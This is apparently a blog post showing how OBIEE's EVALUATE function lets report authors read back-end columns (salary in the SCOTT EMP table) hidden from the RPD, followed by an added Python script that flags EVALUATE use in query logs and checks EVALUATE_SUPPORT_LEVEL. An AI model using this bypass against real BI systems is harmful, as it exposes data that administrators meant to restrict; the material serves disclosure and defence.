Security risk involved in OBIEE 10g/11g, or stealing information using OBIEE
With the EVALUATE function, a report author can read back-end database columns that were never exposed in the RPD. To demonstrate this, we use the SCOTT sample schema and model its EMP and DEPT tables. The SAL and COMM columns are deliberately left out of the EMP table in the model.
With the model built without the SAL and COMM columns, I try the following in an Analysis:
First I select Employee Name and Job. In the next report I define the Job column as:
Evaluate('%1',EMP.JOB)
The report looks like this:
Now I add another column that fetches the salary information:
The result:
Even though the SAL column was never brought into the RPD, I can view its values. Comparing them with the result in SQL Developer:
The results match! The physical query generated for the OBI report (note the replace(SAL||T10687.JOB , T10687.JOB , '') expression that EVALUATE passed straight through to the database):
WITH
SAWITH0 AS (select distinct replace(SAL||T10687.JOB , T10687.JOB , '') as c1,
     T10687.JOB as c2,
     T10687.JOB as c3,
     T10687.ENAME as c4
from
     EMP T10687),
SAWITH1 AS (select D1.c1 as c1,
     D1.c2 as c2,
     D1.c3 as c3,
     D1.c4 as c4,
     D1.c5 as c5
from
     (select 0 as c1,
          D1.c4 as c2,
          D1.c3 as c3,
          D1.c2 as c4,
          D1.c1 as c5,
          ROW_NUMBER() OVER (PARTITION BY D1.c3, D1.c4 ORDER BY D1.c3 ASC, D1.c4 ASC) as c6
     from
          SAWITH0 D1
     ) D1
where ( D1.c6 = 1 ) )
select D1.c1 as c1, D1.c2 as c2, D1.c3 as c3, D1.c4 as c4, D1.c5 as c5
from ( select distinct D1.c1 as c1,
     D1.c2 as c2,
     D1.c3 as c3,
     D1.c4 as c4,
     D1.c5 as c5
from
     SAWITH1 D1
order by c1, c2, c3, c4, c5 ) D1
where rownum <= 40001
Overall, anyone who knows the back-end column name can read it through the EVALUATE function, regardless of which columns the RPD exposes.
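Added example, not code from the original post: a small Python script with the two checks a defender would run after reading this. It assumes the logical SQL has already been pulled out of Usage Tracking or nqquery.log into (user, logical SQL) pairs. It flags every statement that calls EVALUATE (or EVALUATE_AGGR, EVALUATE_PREDICATE, EVALUATE_ANALYTIC), reports which deliberately hidden physical columns the template names, and reads EVALUATE_SUPPORT_LEVEL from an NQSConfig.INI excerpt. In 11g that parameter is what rejects EVALUATE outright (0, the default), restricts it to users with the Admin role (1), or opens it to every user (2). The sample queries, the hidden-column list and the INI excerpt are constructed for this example, not taken from the post.

```python
import re
from typing import Dict, List, Tuple

# EVALUATE and its siblings as they appear in OBIEE logical SQL
EVALUATE_CALL = re.compile(r"\bEVALUATE(?:_AGGR|_PREDICATE|_ANALYTIC)?\s*\(", re.IGNORECASE)
# A single-quoted SQL string literal; '' inside it is an escaped quote
STRING_LITERAL = re.compile(r"\s*'((?:[^']|'')*)'")
# The NQSConfig.INI line, e.g.  EVALUATE_SUPPORT_LEVEL = 2;
SUPPORT_LEVEL = re.compile(r"^\s*EVALUATE_SUPPORT_LEVEL\s*=\s*(\d)\s*;",
                           re.IGNORECASE | re.MULTILINE)

# Physical columns the post deliberately left out of the RPD (constructed list)
HIDDEN_COLUMNS = ("SAL", "COMM")

LEVEL_MEANING = {
    0: "EVALUATE rejected for every user (11g default)",
    1: "EVALUATE allowed only for users with the Admin role",
    2: "EVALUATE allowed for any user",
}

# Constructed (user, logical SQL) pairs standing in for USER_NAME / QUERY_TEXT rows
SAMPLE_QUERIES: List[Tuple[str, str]] = [
    ("weblogic", 'SELECT "EMP"."ENAME", "EMP"."JOB" FROM "SCOTT"'),
    ("analyst1", 'SELECT "EMP"."ENAME", EVALUATE(\'%1\', "EMP"."JOB") FROM "SCOTT"'),
    ("analyst1", 'SELECT "EMP"."ENAME", EVALUATE(\'%1 || SAL\', "EMP"."JOB") FROM "SCOTT"'),
]

# Constructed NQSConfig.INI excerpt showing the weak setting
NQSCONFIG_SAMPLE = """
[ SERVER ]
READ_ONLY_MODE = NO;
EVALUATE_SUPPORT_LEVEL = 2;
"""


def find_evaluate_templates(logical_sql: str) -> List[str]:
    """Return the template string passed as first argument of each EVALUATE call."""
    templates = []
    for call in EVALUATE_CALL.finditer(logical_sql):
        literal = STRING_LITERAL.match(logical_sql, call.end())
        if literal:
            templates.append(literal.group(1).replace("''", "'"))
    return templates


def hidden_columns_in(template: str) -> List[str]:
    """Hidden physical column names mentioned by name inside an EVALUATE template."""
    return [c for c in HIDDEN_COLUMNS if re.search(rf"\b{c}\b", template, re.IGNORECASE)]


def scan_queries(queries: List[Tuple[str, str]]) -> List[Dict]:
    """Flag every query that uses EVALUATE and note which hidden columns it names."""
    findings = []
    for user, sql in queries:
        templates = find_evaluate_templates(sql)
        if not templates:
            continue
        hidden = sorted({c for t in templates for c in hidden_columns_in(t)})
        findings.append({"user": user, "templates": templates, "hidden_columns": hidden})
    return findings


def evaluate_support_level(nqsconfig_text: str) -> int:
    """EVALUATE_SUPPORT_LEVEL from NQSConfig.INI; 0 (disabled) when the line is absent."""
    m = SUPPORT_LEVEL.search(nqsconfig_text)
    return int(m.group(1)) if m else 0


if __name__ == "__main__":
    for f in scan_queries(SAMPLE_QUERIES):
        print(f"user={f['user']} templates={f['templates']} hidden={f['hidden_columns']}")
    level = evaluate_support_level(NQSCONFIG_SAMPLE)
    print(f"EVALUATE_SUPPORT_LEVEL={level}: {LEVEL_MEANING.get(level, 'unknown value')}")
```

Run over the constructed rows, the script reports two EVALUATE queries by analyst1, the second of which names SAL, and reports that the sample NQSConfig.INI leaves EVALUATE open to every user; setting the parameter to 0 (or 1 where administrators genuinely need it) and restarting the BI Server closes the path the post demonstrates.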